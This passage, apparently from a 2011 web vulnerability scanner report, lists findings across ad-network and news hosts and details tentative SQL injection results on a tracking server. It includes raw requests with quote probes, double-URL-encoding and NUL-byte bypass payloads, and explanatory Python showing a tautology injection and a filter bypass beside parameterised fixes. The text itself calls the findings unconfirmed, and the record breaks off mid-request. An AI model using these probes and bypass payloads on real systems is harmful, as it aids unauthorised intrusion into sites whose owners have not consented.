19.32. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

19.33. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

19.34. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

19.35. http://www.personalcreations.com/radioDefault.aspx

19.36. http://www.personalcreations.com/sitemap.aspx

19.37. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

19.38. http://www.reuters.com/assets/commentsChild

19.39. http://www.reuters.com/assets/newsFlash

19.40. http://www.sacbee.com/notfound/

19.41. http://www.scribd.com/embeds/63688924/content

19.42. http://www.scribd.com/embeds/63688924/content_inner

19.43. http://www.sprint.com/index_c.html

19.44. https://www.sprint.net/performance/

19.45. http://www.und.com/sports/m-footbl/9873956

19.46. http://www.und.com/sports/m-footbl/9874134

19.47. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

19.48. http://www.youtube.com/embed/xXftjfC3b5o

20. TRACE method is enabled

20.1. http://bh.contextweb.com/

20.2. http://blogs.sacbee.com/

20.3. http://community.sprint.com/

20.4. http://image2.pubmatic.com/

20.5. http://imp.fetchback.com/

20.6. http://log.c12s.com/

20.7. http://m.xp1.ru4.com/

20.8. http://mi.adinterax.com/

20.9. http://optimized-by.rubiconproject.com/

20.10. http://r.openx.net/

20.11. http://rt.legolas-media.com/

20.12. http://sales.reuters.com/

20.13. http://tacoda.at.atwola.com/

20.14. http://www.sprint.com/

20.15. https://www.sprint.net/

21. Email addresses disclosed

21.1. http://ads.adbrite.com/adserver/vdi/742697

21.2. http://blogs.sacbee.com/the_state_worker/

21.3. http://media.sacbee.com/static/styles/blog_styles.css

21.4. http://s.meebocdn.net/cim/script/cim_v92_cim_11_12_4.en.js

21.5. http://www.google.com/uds/Gfeeds

21.6. http://www.google.com/uds/Gfeeds

21.7. http://www.personalcreations.com/CustomerService-ContactUs.aspx

21.8. http://www.sacbee.com/notfound/

22. Private IP addresses disclosed

22.1. http://www.facebook.com/extern/login_status.php

22.2. http://www.facebook.com/extern/login_status.php

22.3. http://www.facebook.com/plugins/like.php

22.4. http://www.facebook.com/plugins/like.php

22.5. http://www.facebook.com/plugins/likebox.php

23. Robots.txt file

23.1. http://ad.afy11.net/ad

23.2. http://ad.turn.com/server/ads.js

23.3. http://ad.yieldmanager.com/pixel

23.4. http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62

23.5. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

23.6. http://b.scorecardresearch.com/b

23.7. http://c.betrad.com/surly.js

23.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

23.9. http://cdn.gigya.com/js/socialize.js

23.10. http://cdn.optmd.com/V2/89733/235451/index.html

23.11. http://cdn.turn.com/server/ddc.htm

23.12. http://ce.lijit.com/merge

23.13. http://cim.meebo.com/cim

23.14. http://cm.npc-mcclatchy.overture.com/js_1_0/

23.15. http://community.sprint.com/baw/index.jspa

23.16. http://content.usatoday.com/communities/campusrivalry/topics

23.17. http://fonts1.scribdassets.com/static/4gen.css

23.18. http://fonts2.scribdassets.com/static/4gen_ie.css

23.19. http://fonts4.scribdassets.com/static/4gen.js

23.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

23.21. http://get.lingospot.com/arc/stay/

23.22. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

23.23. http://i.casalemedia.com/imp.gif

23.24. http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf

23.25. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

23.26. http://imp.fetchback.com/serve/fb/adtag.js

23.27. http://jlinks.industrybrains.com/jsct

23.28. http://l.addthiscdn.com/live/t00/250lo.gif

23.29. http://m.xp1.ru4.com/activity

23.30. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s87897360916249

23.31. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

23.32. http://pixel.mathtag.com/sync

23.33. http://pixel.quantserve.com/pixel

23.34. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

23.35. http://r.casalemedia.com/rum

23.36. http://r.turn.com/r/beacon

23.37. http://rt.legolas-media.com/lgrt

23.38. http://s0.2mdn.net/2179194/HYSA_BLACK_RATE_300x250_40k.swf

23.39. http://s6.scribdassets.com/aggregated/css/base.css

23.40. http://s7.scribdassets.com/aggregated/css/web.css

23.41. http://sales.reuters.com/pitches/roughcuts/rc728x90.swf

23.42. http://static.lingospot.com/js/all.js

23.43. http://sync.mathtag.com/sync

23.44. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

23.45. http://tcr.tynt.com/javascripts/Tracer.js

23.46. http://trc.taboolasyndication.com/reuters/trc/2/json

23.47. http://turn.nexac.com/r/pu

23.48. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604

23.49. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401

23.50. http://www.bizographics.com/collect/

23.51. http://www.facebook.com/plugins/like.php

23.52. http://www.google-analytics.com/__utm.gif

23.53. http://www.googleadservices.com/pagead/conversion/1031221371/

23.54. http://www.linkedin.com/analytics/

23.55. https://www.linkedin.com/secure/login

23.56. http://www.meebo.com/cim/sandbox.php

23.57. http://www.personalcreations.com/

23.58. http://www.publish2.com/newsgroups/state-worker.js

23.59. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

23.60. http://www.sacbee.com/notfound

23.61. http://www.scribd.com/embeds/63688924/content

23.62. http://www.sprint.com/index_c.html

23.63. https://www.sprint.net/performance

23.64. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

23.65. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

23.66. http://www.youtube.com/embed/xXftjfC3b5o

24. Cacheable HTTPS response

24.1. https://socialize.gigya.com/gs/bookmark.aspx

24.2. https://sprintlb.ehosts.net/narouter/eQueueCheck.aspx

24.3. https://www.sprint.net/performance/

24.4. https://www.sprint.net/performance/gen_line_xml.php

24.5. https://www.sprint.net/performance/gen_pop_xml.php

25. HTML does not specify charset

25.1. http://a1128.g.akamai.net/favicon.ico

25.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

25.3. http://ad.doubleclick.net/adj/sacbee_cim/

25.4. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

25.5. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

25.6. http://ds.addthis.com/red/psi/sites/content.usatoday.com/p.json

25.7. http://graphics.cstv.com/store/.gif

25.8. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

25.9. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

25.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

25.11. http://view.atdmt.com/SPT/iview/194719689/direct/01

25.12. http://view.atdmt.com/SPT/iview/194719690/direct/01

25.13. http://view.atdmt.com/SPT/iview/194719691/direct/01

25.14. http://view.atdmt.com/SPT/iview/194719692/direct/01

25.15. http://view.atdmt.com/SPT/iview/194719693/direct/01

25.16. http://view.atdmt.com/SPT/iview/194719989/direct/01

25.17. http://view.atdmt.com/SPT/iview/194719990/direct/01

25.18. http://view.atdmt.com/SPT/iview/194719991/direct/01

25.19. http://view.atdmt.com/SPT/iview/194719992/direct/01

25.20. http://view.atdmt.com/SPT/iview/194719993/direct/01

25.21. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

25.22. http://w55c.net/ct/cms-2-frame.html

25.23. https://www.sprint.net/performance/gen_line_xml.php

25.24. https://www.sprint.net/performance/gen_pop_xml.php

25.25. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

26. Content type incorrectly stated

26.1. http://ad.doubleclick.net/adj/sacbee_cim/

26.2. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics

26.3. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

26.4. http://html2.scribdassets.com/7lxcv4rog013o5ak/pages/4-ecd404f5dc.jsonp

26.5. http://imp.fetchback.com/serve/fb/adtag.js

26.6. http://js.www.reuters.com/recommend/re/fp

26.7. http://rma-api.gravity.com/v1/beacons/initialize

26.8. http://rt.disqus.com/forums/realtime-cached.js

26.9. http://rt.legolas-media.com/lgrt

26.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

26.11. http://trc.taboolasyndication.com/reuters/trc/2/json

26.12. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1

26.13. http://www.facebook.com/extern/login_status.php

26.14. http://www.reuters.com/assets/breakingNews

26.15. http://www.reuters.com/assets/info

26.16. http://www.reuters.com/assets/searchIntercept

26.17. https://www.sprint.net/performance/gen_line_xml.php

26.18. https://www.sprint.net/performance/gen_pop_xml.php

27. Content type is not specified

27.1. http://rma-api.gravity.com/favicon.ico

27.2. http://www.meebo.com/cmd/btproviders

27.3. http://www.meebo.com/cmd/tc



1. SQL injection
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
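As an added illustration (example code written for this page, not part of the original report or of any scanned site), the following Python builds a constructed SQLite table and runs the two-step parameterised pattern beside the string-splicing pattern it replaces. It also reproduces the single-quote / double-quote probe the scanner relies on throughout section 1, so you can see why a lone quote produces a database error and two quotes do not. The table name, column names and rows are constructed for the demonstration.

```python
import sqlite3

# Constructed in-memory sample table; hypothetical data, not from the report.
SAMPLE_ROWS = [
    ("wa.proflowers.com", "High"),
    ("content.usatoday.com", "High"),
    ("bh.contextweb.com", "Information"),
]


def build_db():
    """Create a throwaway SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE findings (id INTEGER PRIMARY KEY, host TEXT, severity TEXT)"
    )
    conn.executemany(
        "INSERT INTO findings (host, severity) VALUES (?, ?)", SAMPLE_ROWS
    )
    return conn


def find_by_host_unsafe(conn, host):
    """Vulnerable pattern: the value is spliced into the query text, so a quote
    inside `host` changes the structure of the statement."""
    sql = "SELECT id, host, severity FROM findings WHERE host = '%s'" % host
    return conn.execute(sql).fetchall()


def find_by_host_safe(conn, host):
    """Parameterised pattern: step one fixes the structure (the ? placeholder),
    step two binds the value. The driver never re-parses the bound value as SQL."""
    sql = "SELECT id, host, severity FROM findings WHERE host = ?"
    return conn.execute(sql, (host,)).fetchall()


def quote_probe(query_fn, conn, payload):
    """The scanner's heuristic from this report: send a lone quote, then two.
    Returns 'error' if the database rejected the statement, 'ok' otherwise."""
    try:
        query_fn(conn, payload)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = build_db()
    # Unsafe: a lone quote leaves the literal unterminated; '' is a valid literal.
    print(quote_probe(find_by_host_unsafe, db, "'"),
          quote_probe(find_by_host_unsafe, db, "''"))
    # Unsafe: the classic tautology returns every row.
    print(find_by_host_unsafe(db, "' OR '1'='1"))
    # Safe: the same payloads are plain strings that match no host.
    print(quote_probe(find_by_host_safe, db, "'"),
          find_by_host_safe(db, "' OR '1'='1"))
```

The error/no-error pair from `quote_probe` against the unsafe function is exactly the pattern the scanner reports below; against the parameterised function both probes return "ok" and an empty result set, because the quote never reaches the SQL parser as syntax.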

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s81099810544401

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Caveat: the "error message" here is an HTTP 404 with an HTML error body from the Omniture DC collection server (Response 1), and its "disappearance" is a 404 with an empty body (Response 2). Neither response contains a database error; the difference is consistent with the server handling two malformed paths differently, which is why the confidence is only Tentative. Treat the finding as unconfirmed until a database-specific error, or a behavioural difference between benign and SQL-significant input, is observed.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. The 404 body in Response 1 echoes the path as /b%27/..., confirming that the server decoded the value exactly once; the scanner's inference that something is "blocking" the raw quote rests only on the response difference described above.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/proflodevelopment/1/H.22.1/s81099810544401 w
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/proflodevelopment/1/H.22.1/s81099810544401?AQB=1&pccr=true&vidn=2731657005162764-60000183E0004D48&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A10%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD29&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=70&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb3%3Atpf2%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=54c64013-5ca6-4b8c-981b-97bc288ebb06&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb1%3Antc1%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657005162764-60000183E0004D48[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:05 GMT
Server: Omniture DC/2.0.0
xserver: www635
Content-Length: 0
Content-Type: text/html


1.2. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84142070419620 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s84142070419620

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As in 1.1, both responses are HTTP 404s from the Omniture DC server (one with an HTML body, one empty) rather than database errors, so the finding is unconfirmed.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked. Note that Response 1 reports the requested URL as /b/ss, i.e. the path truncated at the NUL byte: it is the server's own error handling that stopped at the NUL, and nothing in the exchange shows that a filter was present or bypassed.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
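The two bypass mechanisms described in 1.1 (double URL-encoding) and 1.2/1.3 (NUL-byte truncation) come down to the same mistake: validating a different string from the one the application finally acts on. The following Python is an added example, not code from the report or from any product it names; the filter rules, the request pipeline and the sample paths are hypothetical and constructed to model the report's probes. It simulates a native-code filter that stops at a NUL byte and an application that URL-decodes a second time, then shows the fix the remediation text calls for: canonicalise once (bounded), reject NUL bytes, and validate the canonical value.

```python
from urllib.parse import unquote

# Tokens the simplified filter refuses to see in a path.
# Hypothetical rule set for the demonstration, not the rules of any real WAF.
BLOCKED_TOKENS = ("'", '"', "--", ";")


def filter_sees_blocked(decoded_path):
    """Simulated native-code filter: it inspects the decoded path as a C string,
    so inspection stops at the first NUL byte (the 1.2/1.3 bypass)."""
    inspected = decoded_path.split("\x00", 1)[0]
    return any(tok in inspected for tok in BLOCKED_TOKENS)


def handle_request(raw_path, app_decodes_again):
    """Weak pipeline: the server decodes once, the filter inspects, and the
    application may decode a second time (the 1.1 bypass). Returns 'blocked'
    or the string the application ends up operating on."""
    once = unquote(raw_path)              # the web server's single decode
    if filter_sees_blocked(once):
        return "blocked"
    return unquote(once) if app_decodes_again else once


def canonicalise(raw_path, max_rounds=3):
    """Decode until the value stops changing, bounded so nested encoding cannot
    loop forever; reject NUL bytes outright."""
    value = raw_path
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise ValueError("too many encoding layers")
    if "\x00" in value:
        raise ValueError("NUL byte in path")
    return value


def handle_request_hardened(raw_path):
    """Fixed pipeline: canonicalise first, validate the canonical form, and
    never decode again afterwards."""
    try:
        path = canonicalise(raw_path)
    except ValueError:
        return "blocked"
    if any(tok in path for tok in BLOCKED_TOKENS):
        return "blocked"
    return path


if __name__ == "__main__":
    # Constructed paths modelled on the report's probes (raw quote, %2527, %00').
    for raw in ("/b'/ss", "/b%2527/ss", "/b/ss%00'/x", "/b/ss/ok"):
        print(repr(raw),
              "weak:", repr(handle_request(raw, app_decodes_again=True)),
              "hardened:", repr(handle_request_hardened(raw)))
```

With the weak pipeline, `/b%2527/ss` passes the filter as `/b%27/ss` and becomes `/b'/ss` only after the application's second decode, and `/b/ss%00'/x` passes because the filter never looks past the NUL. The hardened pipeline blocks both because it validates the fully decoded value and treats a NUL byte as invalid input in its own right.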

Request 1

GET /b/ss%00'/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-new-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:20:50 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84142070419620?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A20%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD24&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=71&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt1%3A%3Atmm2%3A%3Atpp4%3Atrm1%3Attb4%3Atpf2%3A%3Atbc1%3Athp2%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=15a5afb5-0d9c-45c7-84a2-3460492ea8f1&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms2%3Atvc1%3A%3A%3A%3A%3Atxb2%3Atxc1%3A%3A%3A%3A%3A%3Atnp2%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante3%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-new-rowc&c55=D